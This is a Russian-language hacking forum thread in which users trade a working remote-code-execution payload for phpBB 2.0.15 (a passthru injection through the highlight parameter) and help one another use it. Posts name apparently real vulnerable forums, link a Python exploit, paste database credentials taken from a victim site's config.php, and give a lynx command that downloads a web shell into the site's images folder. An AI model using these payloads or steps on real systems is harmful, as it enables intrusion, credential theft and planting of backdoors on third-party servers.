Эксплоит для phpbb 2.0.15
 

Вот вам сплоит . Ждите видео
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'

нифига себе щас попробуем!))

чето не работает сплойт((

Сам ты не работаешь все пашет бери после viewtopic.php?t=243

а у меня вот что отвечает - "Темы, которую вы запросили, не существует"....
В чем моя ошибка?

надо с запросе подставить t=номер существующей темы

а вы что делайте разви почле него не сушествуюший темы не надо тыкать НАРОД сначала зайдите на тему . Бага на других версия не пашет я вчера проверил=((

Не работает... Вот к примеру: http://webportal.kpiservice.com.ua/f...topic.php?t=45

ХЗ братцы у меня тоже не на всех пашет сплоит

всё нормально работает, тока вот искать нужно бажный форум.. берёте и любой форум.. открываете топ, где ОДНО СООБЩЕНИЕ (тогда будет всего ОДНО повторение выполненяемой команды...) и вставляем после номера виевтопика:
&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id

и работаем =))) кстати через поиск в яндексе есть несколько форумов бажных =)) исчите =)) (ЗЫ: всего-то там 4 страницы)...

кстати.. 70% в 15-ой верссии внизу где powered номер версии форума не указывается.. а пишется 2002-2005 =)) нада искать =)

Ну вот сломал. И что дальше. config.php украл. толку от него маловато... Подскажите... Как может хэш админа или БД скомуниздить?

а залить ремвиев не можешь??КЛез нееее я работаю)))

http://www.tavernaclub.com/viewtopic.php?t=54218
ВОТ ТУТ ПРОКАТЫВАЕТ )))

Сплойт на Python,
http://www.security.nnov.ru/files/phpbbex.py

Ну а как его заливать? Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

помогите пожалуйчста, вот я вставил как надо, прокатило вроде, мне выдался списовк файлов и больше ничего, конфига нету, паролей к базе данных всмысле.

temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..

Прописал я сплойт и сообщение которое было в это теме пменялось на:
больше не чего не произошло :(
Мож я что делаю не так ?

Плчему никто видео не снимет?

Попробуй другой топик открыть

На некоторых форумах выдаётся вот такая штука!!!
Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498

Чё это такое?

http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ??? :confused:

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'blend129_form';
$dbuser = 'blend129_form';
$dbpasswd = '109033';

Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).')
можно залить файлы на сервак ?

Ну есть масса способов..
можешь через exec() залить..
но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).

Rebz, приведи для начинающих пример этой команды плизз

Я немного не в ту степь пошёл.. =)
Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом.
Синаксис такой:

lynx -source http://здесь_урл_шелла/shell.php>>1.php
после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images).
Ну и т.д. по аналогии...

как его открыть подробнее пожалуйста напиши.

Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль
к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)

www.[target].ru/viewtopic.php?t=4&cmd=ls&highlight='.passthru($HTT P_GET_VARS[cmd]).'&cmd=id
выдает:

uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500что

дальше делать подскажите, Плизз

Команды Unix выучи потом поймешь =))).

Я даже видео снял вот что то его не публикуют =((((.

и правильно что не публикуют, Кез, молодец -)) не нужно там пол инета хакнутого... пройдет время и можно буит =)

Ну в чём то ты прав а в чём то нет. Пусть другой форум ставят о не этот с уязвимостью.

SanyaX, скинь на webfile.ru потом даш мне код =)) :D

На главной странице где коментарии там есть ссылка на експлойт с расширением php.

SanyaX, я имел виду видео который ты снял...

не знаю как отрагирует администрация от этого.

SanyaX, у тя типа получилось =))